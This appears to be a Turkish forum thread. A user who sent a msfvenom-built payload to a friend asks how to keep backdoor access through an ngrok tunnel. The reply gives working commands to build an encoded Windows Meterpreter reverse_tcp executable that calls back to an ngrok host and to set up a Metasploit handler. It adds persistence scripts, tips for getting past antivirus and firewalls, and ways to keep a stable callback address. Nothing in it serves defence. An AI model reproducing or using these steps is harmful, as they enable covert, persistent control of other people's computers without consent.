Ngrok İle Backdoor Açmak Mümkün Mü?

Ngrok ile tünel açtım. Msfvenom dan arkadaşıma virüs gönderdim. Msfconsole açıp payload ı windows/meterpreter/reverse_tcp yaptım dinlemeye aldım. Arkadaşım bastığında session düştü ama backdoor açmaya çalıştığımda başarısızı oldum. Backdoor açmanın bir yolu var mı ngrok da?

İkinci sorumda şu Ngrok tüneli hep çalışmak zorunda anladığım kadarıyla o bağlantıyı kaybetmemem için. Her yeni açılan tünel farklı ip ve portla açılıyor. Acaba arkaplanda açık kalması yerine farklı bir yöntemi var mı?

 

Dostum öncelikle selam,
Session'a düşmesinin birkaç nedeni olabilir karşı taraf antivürüsü,güvenlik duvarı devrede olabilir bunu bypasslaman gerekiyor ve sistemde kalıcılık elde etmen için Persistent Payload oluşturman gerekiyor.Ngroktan tcp bağlantısı oluşturduğun zaman bir süre sonra bağlantın düşebilir düşmemesi için ngrok'tan static adress alman gerekiyor.Tabi bağlantı konusunun farklı alternatifleri de var.Şimdi aşağıya detaylıca yazacağım

Ufak bir not:Ngrok'tan suspended'a düşebilme potansiyelin var.

Persistent Payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ngrok_ip LPORT=ngrok_port -f exe -o payload.exe --platform windows --arch x86 -i 3

-i 3 : 3 kez encode eder
LHOST ve LPORT değerlerini Ngrok'un anlık TCP adresi ile güncellemen lazım, örnek olarak 0.tcp.ngrok.io:12345

Metasploit'i Dinleme Moduna Al

[/B] msfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 0.0.0.0 # Metasploit'in tüm arayüzleri dinlemesi için set LPORT 4444 # Ngrok'un yerel porta yönlendirme yaptığı port (örneğin 12345 -> 4444) exploit [B]

Ngrok'u ./ngrok tcp 4444 komutuyla başlat. Dış ağdan gelen bağlantılar yerel 4444 portuna yönlensin diye.

Session açıldığında otomatik kalıcılık sağlamak için:
set AutoRunScript persistence -r <ngrok_ip> -p <ngrok_port> -U -i 60 -X

Veya manuel olarak:
meterpreter > run persistence -U -i 60 -p <ngrok_port> -r <ngrok_ip>

Alternatif Payloadlar:

HTTPS Payload: Güvenlik duvarlarını atlamak için windows/meterpreter/reverse_https kullanabilirsin.
Stageless Payload: Daha kararlı bir bağlantı için -f exe yerine -f raw ile stageless payload oluşturabilirsin.

Ngrok Static Address (Ücretli): /ngrok tcp --region=us --remote-addr=1.tcp.ngrok.io:12345 4444

Dinamik DNS Kullanımı: Kendi sunucunda dinamik DNS (örneğin noip.com) kurun ve Ngrok yerine bu servisi kullanabilirsin.

Script ile Otomatik Güncelleme:

Ngrok API'sini kullanarak otomatik IP/port çekip Metasploit konfigürasyonunu güncelleyebilirsin.


Alternatif Tünelleme Araçları:

Cloudflare Tunnel: Ücretsiz ve sabit domain ile çalışır.
Pagekite: Kendi sunucunuzda host edebilirsin.
Localhost.run: Basit bir alternatif.

Saygılarımla